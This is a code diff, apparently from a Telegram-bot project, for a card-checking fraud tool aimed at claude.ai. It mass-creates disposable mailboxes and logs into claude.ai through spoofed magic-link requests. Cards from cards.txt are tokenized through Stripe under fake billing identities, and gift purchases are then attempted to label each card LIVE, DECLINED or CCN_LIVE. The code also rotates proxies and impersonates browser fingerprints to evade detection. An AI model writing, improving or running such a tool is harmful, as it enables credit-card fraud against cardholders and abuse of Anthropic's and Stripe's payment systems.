# 优先检查完整 URL 格式(必须在 colon-split 之前,否则会被错误匹配)
if line.startswith(("http://", "https://", "socks5://")):
try:
from urllib.parse import urlparse
parsed = urlparse(line)
return Proxy(raw=line, url=line, host=parsed.hostname or "?", port=str(parsed.port or "?"))
except Exception:
return None
parts = line.split(":")
if len(parts) == 4:
host, port, user, passwd = parts
url = f"http://{user}:{passwd}@{host}:{port}"
return Proxy(raw=line, url=url, host=host, port=port)
elif len(parts) == 2:
host, port = parts
url = f"http://{host}:{port}"
return Proxy(raw=line, url=url, host=host, port=port)
return None
class ProxyPool:
"""线程安全的代理池"""
def __init__(self):
self._proxies: list[Proxy] = []
self._lock = threading.Lock()
self.enabled = True # 代理开关
self._load()
def _load(self):
"""从 proxy.txt 加载代理"""
if not _PROXY_FILE.exists():
print("[*] 未找到 proxy.txt不使用代理")
return
with open(_PROXY_FILE, "r", encoding="utf-8") as f:
for line in f:
proxy = _parse_line(line)
if proxy:
self._proxies.append(proxy)
if self._proxies:
print(f"[+] 代理池: 已加载 {len(self._proxies)} 个代理")
else:
print("[!] proxy.txt 存在但没有有效代理")
def reload(self):
"""重新加载 proxy.txt"""
with self._lock:
self._proxies.clear()
self._load()
@property
def count(self) -> int:
return len(self._proxies)
@property
def active_count(self) -> int:
"""有效代理数量"""
return sum(1 for p in self._proxies if p.priority > _REMOVE_THRESHOLD)
def get(self) -> dict:
"""
基于优先级加权随机选取一个代理,返回 requests 格式的 proxies dict。
代理关闭或无可用代理时返回空 dict直连
"""
if not self.enabled:
return {}
with self._lock:
alive = [p for p in self._proxies if p.priority > _REMOVE_THRESHOLD]
if not alive:
return {}
# 加权随机priority 越高越容易选中
weights = [p.priority for p in alive]
chosen = random.choices(alive, weights=weights, k=1)[0]
return {"http": chosen.url, "https": chosen.url}
def report_success(self, proxies: dict):
"""调用方报告该代理请求成功"""
if not proxies:
return
url = proxies.get("https", "")
with self._lock:
for p in self._proxies:
if p.url == url:
p.success_count += 1
p.priority = min(p.priority + _SUCCESS_BONUS, _MAX_PRIORITY)
break
def report_failure(self, proxies: dict):
"""调用方报告该代理请求失败,降低优先级"""
if not proxies:
return
url = proxies.get("https", "")
with self._lock:
for p in self._proxies:
if p.url == url:
p.fail_count += 1
p.priority -= _FAIL_PENALTY
if p.priority <= _REMOVE_THRESHOLD:
print(f"[!] 代理已淘汰 (优先级归零): {p.masked_url}")
break
def _cleanup(self):
"""移除优先级过低的代理"""
before = len(self._proxies)
self._proxies = [p for p in self._proxies if p.priority > _REMOVE_THRESHOLD]
removed = before - len(self._proxies)
if removed:
print(f"[!] 清理了 {removed} 个失效代理,剩余 {len(self._proxies)}")
self._save()
def _save(self):
"""将当前有效代理写回 proxy.txt"""
with open(_PROXY_FILE, "w", encoding="utf-8") as f:
for p in self._proxies:
f.write(p.raw + "\n")
def test_one(self, proxy: Proxy) -> dict:
"""测试单个代理,返回结果 dict"""
logger.info(f"🔍 测试代理: {proxy.masked_url}")
proxies = {"http": proxy.url, "https": proxy.url}
try:
start = time.time()
resp = std_requests.get(
_TEST_URL,
proxies=proxies,
timeout=_TEST_TIMEOUT,
allow_redirects=True,
)
latency = (time.time() - start) * 1000 # ms
proxy.latency = latency
proxy.last_test_time = time.time()
if resp.status_code < 500:
proxy.last_test_ok = True
proxy.success_count += 1
proxy.priority = min(proxy.priority + _SUCCESS_BONUS, _MAX_PRIORITY)
logger.info(f" ✅ 通过 {proxy.masked_url} | {round(latency)}ms | HTTP {resp.status_code}")
return {"ok": True, "latency_ms": round(latency), "status": resp.status_code}
else:
proxy.last_test_ok = False
proxy.fail_count += 1
proxy.priority -= _FAIL_PENALTY
logger.warning(f" ❌ 失败 {proxy.masked_url} | HTTP {resp.status_code}")
return {"ok": False, "latency_ms": round(latency), "error": f"HTTP {resp.status_code}"}
except std_requests.exceptions.ConnectTimeout:
proxy.last_test_ok = False
proxy.fail_count += 1
proxy.priority -= _FAIL_PENALTY
proxy.last_test_time = time.time()
logger.warning(f" ❌ 超时 {proxy.masked_url}")
return {"ok": False, "latency_ms": -1, "error": "连接超时"}
except std_requests.exceptions.ProxyError as e:
proxy.last_test_ok = False
proxy.fail_count += 1
proxy.priority -= _FAIL_PENALTY
proxy.last_test_time = time.time()
logger.warning(f" ❌ 代理错误 {proxy.masked_url}: {e}")
return {"ok": False, "latency_ms": -1, "error": f"代理错误: {e}"}
except Exception as e:
proxy.last_test_ok = False
proxy.fail_count += 1
proxy.priority -= _FAIL_PENALTY
proxy.last_test_time = time.time()
logger.warning(f" ❌ 异常 {proxy.masked_url}: {e}")
return {"ok": False, "latency_ms": -1, "error": str(e)}
def test_all(self, progress_callback: Optional[Callable] = None, max_workers: int = 5) -> list[dict]:
"""
并发测试所有代理,返回结果列表。
测试后自动清理优先级过低的代理。
Args:
progress_callback: 可选回调函数,签名 (current, total, result_dict) -> None
每测完一个代理后调用,用于更新前端进度。
max_workers: 并发测试线程数,默认 5。
"""
from concurrent.futures import ThreadPoolExecutor, as_completed
with self._lock:
proxies_snapshot = list(self._proxies)
total = len(proxies_snapshot)
logger.info(f"📡 开始并发测试 {total} 个代理({max_workers} 并发)...")
results = [None] * total # 保持顺序
completed = [0] # 用列表以便在闭包中修改
results_lock = threading.Lock()
def _test_proxy(index, proxy):
result = self.test_one(proxy)
result["proxy"] = proxy.masked_url
result["priority"] = proxy.priority
return index, result
with ThreadPoolExecutor(max_workers=max_workers) as executor:
futures = {
executor.submit(_test_proxy, i, proxy): i
for i, proxy in enumerate(proxies_snapshot)
}
for future in as_completed(futures):
idx, result = future.result()
results[idx] = result
with results_lock:
completed[0] += 1
current = completed[0]
if progress_callback:
try:
progress_callback(current, total, result)
except Exception:
pass
ok_count = sum(1 for r in results if r and r["ok"])
fail_count = total - ok_count
logger.info(
f"📡 代理测试完成: ✅ 通过 {ok_count} | ❌ 失败 {fail_count} | "
f"剩余可用 {self.active_count}"
)
with self._lock:
self._cleanup()
return results
def status_list(self) -> list[dict]:
"""返回所有代理的状态信息"""
with self._lock:
return [
{
"proxy": p.masked_url,
"priority": p.priority,
"latency_ms": round(p.latency) if p.latency else "-",
"success": p.success_count,
"fail": p.fail_count,
"last_ok": p.last_test_ok,
}
for p in self._proxies
]
# --- 全局单例 ---
pool = ProxyPool()
def get_proxy() -> dict:
"""供外部模块调用:随机获取一个代理"""
return pool.get()
def get_proxy_count() -> int:
"""代理池大小"""
return pool.count

91
core/stripe_token.py Normal file
View File

@@ -0,0 +1,91 @@
import uuid
import random
from curl_cffi import requests # 用于模拟指纹
from config import STRIPE_PK, get_proxy
from core.identity import random_address, random_name
class StripeTokenizer:
def __init__(self, user_agent):
self.user_agent = user_agent
self.guid = f"{uuid.uuid4()}0a75cf"
self.muid = f"{uuid.uuid4()}1d4c1f"
self.sid = f"{uuid.uuid4()}eb67c4"
self.client_session_id = str(uuid.uuid4())
self.elements_session_config_id = str(uuid.uuid4())
def get_token(self, cc_num, exp_m, exp_y, cvc):
"""与 Stripe 交互获取 pm_id"""
url = "https://api.stripe.com/v1/payment_methods"
headers = {
"Host": "api.stripe.com",
"Content-Type": "application/x-www-form-urlencoded",
"Sec-Ch-Ua-Platform": '"Linux"',
"User-Agent": self.user_agent,
"Accept": "application/json",
"Sec-Ch-Ua": '"Google Chrome";v="143", "Chromium";v="143", "Not A(Brand";v="24"',
"Sec-Ch-Ua-Mobile": "?0",
"Origin": "https://js.stripe.com",
"Sec-Fetch-Site": "same-site",
"Sec-Fetch-Mode": "cors",
"Sec-Fetch-Dest": "empty",
"Referer": "https://js.stripe.com/",
"Accept-Encoding": "gzip, deflate, br",
"Accept-Language": "zh-CN,zh;q=0.9",
"Priority": "u=1, i"
}
# 构造完整的 form-data
time_on_page = random.randint(30000, 500000)
addr = random_address()
name = random_name()
data = {
"type": "card",
"card[number]": cc_num,
"card[cvc]": cvc,
"card[exp_year]": exp_y[-2:] if len(exp_y) == 4 else exp_y,
"card[exp_month]": exp_m,
"allow_redisplay": "unspecified",
"billing_details[address][postal_code]": addr["postal_code"],
"billing_details[address][country]": addr["country"],
"billing_details[address][line1]": addr["line1"],
"billing_details[address][city]": addr["city"],
"billing_details[address][state]": addr["state"],
"billing_details[name]": name,
"billing_details[phone]": "",
"payment_user_agent": "stripe.js/5766238eed; stripe-js-v3/5766238eed; payment-element; deferred-intent; autopm",
"referrer": "https://claude.ai",
"time_on_page": str(time_on_page),
"client_attribution_metadata[client_session_id]": self.client_session_id,
"client_attribution_metadata[merchant_integration_source]": "elements",
"client_attribution_metadata[merchant_integration_subtype]": "payment-element",
"client_attribution_metadata[merchant_integration_version]": "2021",
"client_attribution_metadata[payment_intent_creation_flow]": "deferred",
"client_attribution_metadata[payment_method_selection_flow]": "automatic",
"client_attribution_metadata[elements_session_config_id]": self.elements_session_config_id,
"client_attribution_metadata[merchant_integration_additional_elements][0]": "payment",
"client_attribution_metadata[merchant_integration_additional_elements][1]": "address",
"guid": self.guid,
"muid": self.muid,
"sid": self.sid,
"key": STRIPE_PK,
"_stripe_version": "2025-03-31.basil"
}
try:
print(f"[*] 正在向 Stripe 请求 Token: {cc_num[:4]}******{cc_num[-4:]}")
resp = requests.post(url, data=data, headers=headers, impersonate="chrome124", proxies=get_proxy())
if resp.status_code == 200:
pm_id = resp.json().get("id")
print(f"[+] Stripe Token 获取成功: {pm_id}")
return pm_id
else:
print(f"[-] Stripe 拒绝: {resp.text}")
return None
except Exception as e:
print(f"[-] Stripe 连接错误: {e}")
return None

188
deploy.sh Normal file
View File

@@ -0,0 +1,188 @@
#!/bin/bash
# ============================================================
# autoClaude-TGbot 一键部署脚本
# 用法: chmod +x deploy.sh && sudo ./deploy.sh
# ============================================================
set -e
# --- 颜色 ---
RED='\033[0;31m'
GREEN='\033[0;32m'
YELLOW='\033[1;33m'
CYAN='\033[0;36m'
NC='\033[0m'
info() { echo -e "${CYAN}[INFO]${NC} $1"; }
ok() { echo -e "${GREEN}[✔]${NC} $1"; }
warn() { echo -e "${YELLOW}[!]${NC} $1"; }
err() { echo -e "${RED}[✘]${NC} $1"; exit 1; }
# --- 检查 root ---
if [ "$EUID" -ne 0 ]; then
err "请使用 sudo 运行: sudo ./deploy.sh"
fi
# --- 变量 ---
APP_NAME="autoclaude-tgbot"
APP_DIR="$(cd "$(dirname "$0")" && pwd)"
SERVICE_FILE="/etc/systemd/system/${APP_NAME}.service"
RUN_USER="${SUDO_USER:-$(whoami)}"
RUN_GROUP="$(id -gn "$RUN_USER")"
echo ""
echo -e "${CYAN}╔══════════════════════════════════════════╗${NC}"
echo -e "${CYAN}║ autoClaude-TGbot 一键部署 ║${NC}"
echo -e "${CYAN}╚══════════════════════════════════════════╝${NC}"
echo ""
info "项目目录: ${APP_DIR}"
info "运行用户: ${RUN_USER}"
echo ""
# ============================================================
# 1. 安装系统依赖
# ============================================================
info "检查系统依赖..."
# 确保 uv 路径在 PATH 中
export PATH="$HOME/.local/bin:/root/.local/bin:$PATH"
# 安装 uv如果不存在
if ! command -v uv &> /dev/null; then
info "安装 uv..."
curl -LsSf https://astral.sh/uv/install.sh | sh
ok "uv 已安装"
else
ok "uv 已存在 ($(uv --version))"
fi
# ============================================================
# 2. 安装 Python 依赖
# ============================================================
info "安装 Python 依赖..."
cd "$APP_DIR"
if uv sync; then
ok "依赖安装完成"
else
warn "uv sync 失败,尝试 uv pip install..."
if uv pip install -r pyproject.toml; then
ok "依赖安装完成 (pip fallback)"
else
err "依赖安装失败,请手动检查"
fi
fi
# ============================================================
# 3. 检查配置文件
# ============================================================
if [ ! -f "${APP_DIR}/config.toml" ]; then
warn "config.toml 不存在,从模板复制..."
cp "${APP_DIR}/config.toml.example" "${APP_DIR}/config.toml"
chown "$RUN_USER:$RUN_GROUP" "${APP_DIR}/config.toml"
echo ""
echo -e "${YELLOW}════════════════════════════════════════════${NC}"
echo -e "${YELLOW} ⚠️ 请编辑 config.toml 填入实际配置:${NC}"
echo -e "${YELLOW} nano ${APP_DIR}/config.toml${NC}"
echo -e "${YELLOW}════════════════════════════════════════════${NC}"
echo ""
read -p "编辑完成后按 Enter 继续,或 Ctrl+C 退出..." _
else
ok "config.toml 已存在"
fi
# ============================================================
# 4. 获取 uv 和 python 路径
# ============================================================
UV_PATH="$(which uv 2>/dev/null || echo '')"
if [ -z "$UV_PATH" ]; then
# 尝试常见路径
for p in "$HOME/.local/bin/uv" "/root/.local/bin/uv" "/usr/local/bin/uv"; do
if [ -x "$p" ]; then UV_PATH="$p"; break; fi
done
fi
if [ -z "$UV_PATH" ]; then
err "找不到 uv请检查安装是否成功"
fi
info "uv 路径: ${UV_PATH}"
# ============================================================
# 5. 创建 systemd 服务
# ============================================================
info "创建 systemd 服务: ${APP_NAME}"
cat > "$SERVICE_FILE" <<EOF
[Unit]
Description=autoClaude Telegram Bot
After=network.target
Wants=network-online.target
[Service]
Type=simple
User=${RUN_USER}
Group=${RUN_GROUP}
WorkingDirectory=${APP_DIR}
ExecStart=${UV_PATH} run python bot.py
Restart=on-failure
RestartSec=10
StartLimitIntervalSec=60
StartLimitBurst=3
# 环境
Environment=PYTHONUNBUFFERED=1
# 日志
StandardOutput=journal
StandardError=journal
SyslogIdentifier=${APP_NAME}
# 安全加固
NoNewPrivileges=true
ProtectSystem=strict
ReadWritePaths=${APP_DIR}
PrivateTmp=true
[Install]
WantedBy=multi-user.target
EOF
ok "服务文件已创建: ${SERVICE_FILE}"
# ============================================================
# 6. 启用并启动服务
# ============================================================
info "重载 systemd 配置..."
systemctl daemon-reload
info "启用开机自启..."
systemctl enable "$APP_NAME"
info "启动服务..."
systemctl restart "$APP_NAME"
# 等一会检查状态
sleep 2
if systemctl is-active --quiet "$APP_NAME"; then
ok "服务已启动!"
else
warn "服务启动可能失败,请检查日志"
fi
# ============================================================
# 7. 完成
# ============================================================
echo ""
echo -e "${GREEN}╔══════════════════════════════════════════╗${NC}"
echo -e "${GREEN}║ ✅ 部署完成! ║${NC}"
echo -e "${GREEN}╚══════════════════════════════════════════╝${NC}"
echo ""
echo -e " ${CYAN}常用命令:${NC}"
echo ""
echo -e " 查看状态 ${GREEN}systemctl status ${APP_NAME}${NC}"
echo -e " 查看日志 ${GREEN}journalctl -u ${APP_NAME} -f${NC}"
echo -e " 重启服务 ${GREEN}systemctl restart ${APP_NAME}${NC}"
echo -e " 停止服务 ${GREEN}systemctl stop ${APP_NAME}${NC}"
echo -e " 编辑配置 ${GREEN}nano ${APP_DIR}/config.toml${NC}"
echo ""
echo -e " ${YELLOW}修改配置后记得重启: systemctl restart ${APP_NAME}${NC}"
echo ""

474
main.py
View File

@@ -1,468 +1,34 @@
import time import time
import uuid
import random import random
import string import string
import re
import json
import base64
import requests as standard_requests # 用于普通API交互
from curl_cffi import requests # 用于模拟指纹
from urllib.parse import urlparse, parse_qs
# --- 配置区域 (Configuration) --- from config import MAIL_SYSTEMS
# cloudmail邮件系统配置 from core.mail_service import MailPool, extract_magic_link
MAIL_API_BASE = "https://xxxxx.com/" # 替换为你的邮件API域名 from core.stripe_token import StripeTokenizer
ADMIN_EMAIL = "admin@xxxxx.com" # 替换你的管理员邮箱 from core.gift_checker import GiftChecker
ADMIN_PASS = "xxxxx" # 替换你的管理员密码 from core.claude_auth import attack_claude, finalize_login
MAIL_DOMAIN = "xxxxx.com" # 你的临时邮箱域名
# Claude 配置
CLAUDE_URL = "https://claude.ai/api/auth/send_magic_link"
#
UA = "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36"
# Stripe Public Key
STRIPE_PK = "pk_live_51MExQ9BjIQrRQnuxA9s9ahUkfIUHPoc3NFNidarWIUhEpwuc1bdjSJU9medEpVjoP4kTUrV2G8QWdxi9GjRJMUri005KO5xdyD"
# Gift Product ID
PRODUCT_ID = "prod_TXU4hGh2EDxASl"
class ClaudeAccount:
def __init__(self, email, session_key, org_uuid, user_agent):
self.email = email
self.session_key = session_key
self.org_uuid = org_uuid
self.user_agent = user_agent
self.device_id = str(uuid.uuid4())
class MailSystem:
def __init__(self, base_url, admin_email, admin_password):
self.base_url = base_url
self.token = self._get_token(admin_email, admin_password)
self.headers = {"Authorization": self.token}
def _get_token(self, email, password):
"""获取身份令牌,这是我们的通行证"""
url = f"{self.base_url}/api/public/genToken"
payload = {"email": email, "password": password}
try:
resp = standard_requests.post(url, json=payload)
data = resp.json()
if data['code'] == 200:
print(f"[+] 令牌获取成功: {data['data']['token'][:10]}...")
return data['data']['token']
else:
raise Exception(f"获取Token失败: {data}")
except Exception as e:
print(f"[-] 连接邮件系统失败: {e}")
exit(1)
def create_user(self, email_prefix):
"""在你的系统里注册一个新灵魂"""
full_email = f"{email_prefix}@{MAIL_DOMAIN}"
url = f"{self.base_url}/api/public/addUser"
# 接口要求 list 结构
payload = {
"list": [
{
"email": full_email,
"password": "random_pass_ignoring_this"
}
]
}
resp = standard_requests.post(url, json=payload, headers=self.headers)
if resp.json().get('code') == 200:
print(f"[+] 邮箱用户创建成功: {full_email}")
return full_email
else:
print(f"[-] 创建邮箱失败: {resp.text}")
return None
def wait_for_email(self, to_email, retry_count=20, sleep_time=3):
"""像猎人一样耐心等待猎物出现"""
url = f"{self.base_url}/api/public/emailList"
payload = {
"toEmail": to_email,
"sendName": "Anthropic", # 发件人是 Anthropic 不是 Claude
"num": 1,
"size": 10,
"timeSort": "desc"
}
print(f"[*] 开始轮询邮件,目标: {to_email}...")
for i in range(retry_count):
try:
resp = standard_requests.post(url, json=payload, headers=self.headers)
data = resp.json()
if data.get('code') == 200 and data.get('data'):
emails = data['data']
# 检查是否有来自 Claude 的邮件
for email in emails:
# 这里可以加更严格的判断,比如 subject 包含 "sign in"
print(f"[!] 捕获到邮件! 主题: {email.get('subject')}")
return email.get('content') or email.get('text')
print(f"[*] 轮询中 ({i+1}/{retry_count})...")
time.sleep(sleep_time)
except Exception as e:
print(f"[-] 轮询出错: {e}")
time.sleep(sleep_time)
print("[-] 等待超时,未收到邮件。")
return None
def extract_magic_link(html_content):
"""HTML提取出链接"""
if not html_content:
return None
pattern = r'href="(https://claude\.ai/[^"]+)"'
match = re.search(pattern, html_content)
if match:
url = match.group(1)
return url.replace("&amp;", "&")
return None
class StripeTokenizer:
def __init__(self, user_agent):
self.user_agent = user_agent
self.guid = f"{uuid.uuid4()}0a75cf"
self.muid = f"{uuid.uuid4()}1d4c1f"
self.sid = f"{uuid.uuid4()}eb67c4"
self.client_session_id = str(uuid.uuid4())
self.elements_session_config_id = str(uuid.uuid4())
def get_token(self, cc_num, exp_m, exp_y, cvc):
"""与 Stripe 交互获取 pm_id"""
url = "https://api.stripe.com/v1/payment_methods"
headers = {
"Host": "api.stripe.com",
"Content-Type": "application/x-www-form-urlencoded",
"Sec-Ch-Ua-Platform": '"Linux"',
"User-Agent": self.user_agent,
"Accept": "application/json",
"Sec-Ch-Ua": '"Google Chrome";v="143", "Chromium";v="143", "Not A(Brand";v="24"',
"Sec-Ch-Ua-Mobile": "?0",
"Origin": "https://js.stripe.com",
"Sec-Fetch-Site": "same-site",
"Sec-Fetch-Mode": "cors",
"Sec-Fetch-Dest": "empty",
"Referer": "https://js.stripe.com/",
"Accept-Encoding": "gzip, deflate, br",
"Accept-Language": "zh-CN,zh;q=0.9",
"Priority": "u=1, i"
}
# 构造完整的 form-data
time_on_page = random.randint(30000, 500000)
data = {
"type": "card",
"card[number]": cc_num,
"card[cvc]": cvc,
"card[exp_year]": exp_y[-2:] if len(exp_y) == 4 else exp_y,
"card[exp_month]": exp_m,
"allow_redisplay": "unspecified",
"billing_details[address][postal_code]": "91505",
"billing_details[address][country]": "US",
"billing_details[address][line1]": "3891 Libby Street",
"billing_details[address][city]": "Burbank",
"billing_details[address][state]": "CA",
"billing_details[name]": "Test User",
"billing_details[phone]": "",
"payment_user_agent": "stripe.js/5766238eed; stripe-js-v3/5766238eed; payment-element; deferred-intent; autopm",
"referrer": "https://claude.ai",
"time_on_page": str(time_on_page),
"client_attribution_metadata[client_session_id]": self.client_session_id,
"client_attribution_metadata[merchant_integration_source]": "elements",
"client_attribution_metadata[merchant_integration_subtype]": "payment-element",
"client_attribution_metadata[merchant_integration_version]": "2021",
"client_attribution_metadata[payment_intent_creation_flow]": "deferred",
"client_attribution_metadata[payment_method_selection_flow]": "automatic",
"client_attribution_metadata[elements_session_config_id]": self.elements_session_config_id,
"client_attribution_metadata[merchant_integration_additional_elements][0]": "payment",
"client_attribution_metadata[merchant_integration_additional_elements][1]": "address",
"guid": self.guid,
"muid": self.muid,
"sid": self.sid,
"key": STRIPE_PK,
"_stripe_version": "2025-03-31.basil"
}
try:
print(f"[*] 正在向 Stripe 请求 Token: {cc_num[:4]}******{cc_num[-4:]}")
resp = requests.post(url, data=data, headers=headers, impersonate="chrome124")
if resp.status_code == 200:
pm_id = resp.json().get("id")
print(f"[+] Stripe Token 获取成功: {pm_id}")
return pm_id
else:
print(f"[-] Stripe 拒绝: {resp.text}")
return None
except Exception as e:
print(f"[-] Stripe 连接错误: {e}")
return None
class GiftChecker:
def __init__(self, account: ClaudeAccount):
self.account = account
def purchase(self, pm_id):
"""尝试购买 Gift"""
url = f"https://claude.ai/api/billing/{self.account.org_uuid}/gift/purchase"
headers = {
"Host": "claude.ai",
"User-Agent": self.account.user_agent,
"Content-Type": "application/json",
"Accept": "*/*",
"Anthropic-Client-Version": "1.0.0",
"Anthropic-Client-Platform": "web_claude_ai",
"Anthropic-Device-Id": self.account.device_id,
"Origin": "https://claude.ai",
"Referer": "https://claude.ai/gift",
"Cookie": f"sessionKey={self.account.session_key}"
}
payload = {
"product_id": PRODUCT_ID,
"currency": "USD",
"payment_method_id": pm_id,
"to_email": self.account.email,
"to_name": "",
"from_name": "Checker",
"from_email": self.account.email,
"gift_message": "",
"card_color": "clay",
"billing_address": {
"line1": "3891 Libby Street",
"city": "Burbank",
"state": "CA",
"postal_code": "91505",
"country": "US"
},
"scheduled_delivery_at": None
}
try:
print(f"[*] 正在尝试扣款 (Gift Purchase)...")
resp = requests.post(url, json=payload, headers=headers, impersonate="chrome124")
resp_json = {}
try:
resp_json = resp.json()
except:
pass
if resp.status_code == 200:
print("[$$$] 成功! CHARGED! 该卡有效 (Live)!")
return "LIVE"
elif resp.status_code == 402:
err_msg = resp_json.get("error", {}).get("message", "Unknown error")
print(f"[-] 支付失败 (402): {err_msg}")
if "declined" in err_msg.lower():
return "DECLINED"
elif "insufficient" in err_msg.lower():
return "INSUFFICIENT_FUNDS"
elif "security code" in err_msg.lower() or "cvc" in err_msg.lower():
print("[!] CCN LIVE (CVC 错误,说明卡号有效)")
return "CCN_LIVE"
else:
return "DEAD"
else:
print(f"[-] 未知响应 Code: {resp.status_code}, Body: {resp.text}")
return "ERROR"
except Exception as e:
print(f"[-] 购买请求异常: {e}")
return "ERROR"
def attack_claude(target_email):
"""伪装成浏览器发起攻击"""
device_id = str(uuid.uuid4())
headers = {
"Host": "claude.ai",
"Anthropic-Anonymous-Id": f"claudeai.v1.{uuid.uuid4()}",
"Sec-Ch-Ua-Full-Version-List": '"Google Chrome";v="143.0.7499.105", "Chromium";v="143.0.7499.105", "Not A(Brand";v="24.0.0.0"',
"Sec-Ch-Ua-Platform": '"Linux"',
"Sec-Ch-Ua": '"Google Chrome";v="143", "Chromium";v="143", "Not A(Brand";v="24"',
"Baggage": "sentry-environment=production,sentry-release=ce5600af514463a166f4cd356a6afbc46ee5cd3d,sentry-public_key=58e9b9d0fc244061a1b54fe288b0e483,sentry-trace_id=7bdc872994f347d6b5a610a520f40401,sentry-org_id=1158394",
"Anthropic-Client-Sha": "ce5600af514463a166f4cd356a6afbc46ee5cd3d",
"Content-Type": "application/json",
"Anthropic-Client-Platform": "web_claude_ai",
"Anthropic-Device-Id": device_id,
"Anthropic-Client-Version": "1.0.0",
"User-Agent": "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36",
"Origin": "https://claude.ai",
"Referer": "https://claude.ai/login?returnTo=%2Fonboarding",
"Accept-Encoding": "gzip, deflate, br",
"Accept-Language": "zh-CN,zh;q=0.9",
"Priority": "u=1, i"
}
payload = {
"utc_offset": -480,
"email_address": target_email,
"login_intent": None,
"locale": "en-US",
"oauth_client_id": None,
"source": "claude"
}
try:
print(f"[*] 正在向 Claude 发送 Magic Link 请求: {target_email}")
session = requests.Session()
response = session.post(
CLAUDE_URL,
json=payload,
headers=headers,
impersonate="chrome124"
)
if response.status_code == 200:
print("[+] 请求成功Claude 已发信。")
return True
elif response.status_code == 429:
print("[-] 被限流了 (Rate Limited)。")
else:
print(f"[-] 请求失败 Code: {response.status_code}, Body: {response.text}")
except Exception as e:
print(f"[-] 发生异常: {e}")
return False
def finalize_login(magic_link_fragment):
"""
完成最后一步:无需浏览器,直接交换 sessionKey。
magic_link_fragment 格式: https://claude.ai/magic-link#token:base64_email
返回 ClaudeAccount 对象
"""
# 1. 外科手术式拆解 Hash
if '#' in magic_link_fragment:
fragment = magic_link_fragment.split('#')[1]
else:
fragment = magic_link_fragment
if ':' not in fragment:
print("[-] 链接格式错误: 找不到 token 和 email 的分隔符")
return None
# 分割 nonce 和 base64_email
nonce, encoded_email = fragment.split(':', 1)
try:
decoded_email = base64.b64decode(encoded_email).decode('utf-8')
print(f"[*] 解析成功 -> Email: {decoded_email} | Nonce: {nonce[:8]}...")
except:
print(f"[*] 解析成功 -> Nonce: {nonce[:8]}...")
# 2. 构造最终 payload
verify_url = "https://claude.ai/api/auth/verify_magic_link"
payload = {
"credentials": {
"method": "nonce",
"nonce": nonce,
"encoded_email_address": encoded_email
},
"locale": "en-US",
"oauth_client_id": None,
"source": "claude"
}
# 3. 伪造指纹头
device_id = str(uuid.uuid4())
headers = {
"Host": "claude.ai",
"Content-Type": "application/json",
"Origin": "https://claude.ai",
"Referer": "https://claude.ai/magic-link",
"User-Agent": UA,
"Accept": "*/*",
"Accept-Language": "zh-CN,zh;q=0.9",
"Anthropic-Client-Version": "1.0.0",
"Anthropic-Client-Platform": "web_claude_ai",
"Anthropic-Device-Id": device_id,
"Sec-Fetch-Dest": "empty",
"Sec-Fetch-Mode": "cors",
"Sec-Fetch-Site": "same-origin",
"Priority": "u=1, i"
}
try:
print(f"[*] 正在交换 SessionKey...")
session = requests.Session()
response = session.post(
verify_url,
json=payload,
headers=headers,
impersonate="chrome124"
)
if response.status_code == 200:
data = response.json()
# 1. 提取 SessionKey
session_key = response.cookies.get("sessionKey")
if not session_key:
for name, value in response.cookies.items():
if name == "sessionKey":
session_key = value
break
if not session_key:
print("[-] 请求成功 (200),但未在 Cookie 中找到 sessionKey。")
print(f"Response: {str(data)[:200]}...")
return None
# 2. 提取 Org UUID
try:
org_uuid = data['account']['memberships'][0]['organization']['uuid']
email = data['account']['email_address']
print(f"[+] 登录成功。OrgID: {org_uuid}")
return ClaudeAccount(email, session_key, org_uuid, UA)
except KeyError as e:
print(f"[-] 无法提取 Organization UUID结构可能变了: {e}")
print(f"Response keys: {data.keys() if isinstance(data, dict) else type(data)}")
return None
else:
print(f"[-] 交换失败 Code: {response.status_code}")
print(f"Body: {response.text}")
return None
except Exception as e:
print(f"[-] 发生异常: {e}")
return None
# --- 主流程 (The Ritual) --- # --- 主流程 (The Ritual) ---
if __name__ == "__main__": if __name__ == "__main__":
# 1. 初始化邮系统 # 1. 初始化邮系统
mail_sys = MailSystem(MAIL_API_BASE, ADMIN_EMAIL, ADMIN_PASS) mail_pool = MailPool(MAIL_SYSTEMS)
if mail_pool.count == 0:
print("[-] 没有可用的邮箱系统,退出。")
exit(1)
print(mail_pool.info())
# 2. 生成随机邮箱并注册 # 2. 生成随机邮箱并注册
# 生成 10 位随机字符作为邮箱前缀
random_prefix = ''.join(random.choices(string.ascii_lowercase + string.digits, k=10)) random_prefix = ''.join(random.choices(string.ascii_lowercase + string.digits, k=10))
target_email = mail_sys.create_user(random_prefix) target_email, mail_sys = mail_pool.create_user(random_prefix)
if target_email: if target_email and mail_sys:
# 3. 发送 Magic Link # 3. 发送 Magic Link
if attack_claude(target_email): if attack_claude(target_email):
# 4. 等待并提取链接 # 4. 等待并提取链接(使用创建邮箱时对应的系统)
email_content = mail_sys.wait_for_email(target_email) email_content = mail_sys.wait_for_email(target_email)
if email_content: if email_content:
@@ -486,7 +52,6 @@ if __name__ == "__main__":
print("="*50 + "\n") print("="*50 + "\n")
# --- CC Checker 流程 --- # --- CC Checker 流程 ---
# 从 cards.txt 读取卡片列表 (格式: CARD|MM|YY|CVC)
cards = [] cards = []
try: try:
with open("cards.txt", "r") as f: with open("cards.txt", "r") as f:
@@ -504,18 +69,11 @@ if __name__ == "__main__":
for card_line in cards: for card_line in cards:
cc, mm, yy, cvc = card_line.split("|") cc, mm, yy, cvc = card_line.split("|")
# 1. 获取 Stripe Token
pm_id = tokenizer.get_token(cc, mm, yy, cvc) pm_id = tokenizer.get_token(cc, mm, yy, cvc)
if pm_id: if pm_id:
# 2. 尝试购买
result = checker.purchase(pm_id) result = checker.purchase(pm_id)
# 3. 输出结果
print(f"Card: {cc[:4]}... -> {result}") print(f"Card: {cc[:4]}... -> {result}")
# 不要跑太快,防止封 Session
time.sleep(2) time.sleep(2)
else: else:
print("[-] 获取 Account 失败。") print("[-] 获取 Account 失败。")

View File

@@ -6,5 +6,7 @@ readme = "README.md"
requires-python = ">=3.12" requires-python = ">=3.12"
dependencies = [ dependencies = [
"curl-cffi>=0.14.0", "curl-cffi>=0.14.0",
"faker>=36.0.0",
"python-telegram-bot>=21.0",
"requests>=2.32.5", "requests>=2.32.5",
] ]

101
uv.lock generated
View File

@@ -1,6 +1,23 @@
version = 1 version = 1
revision = 3 revision = 3
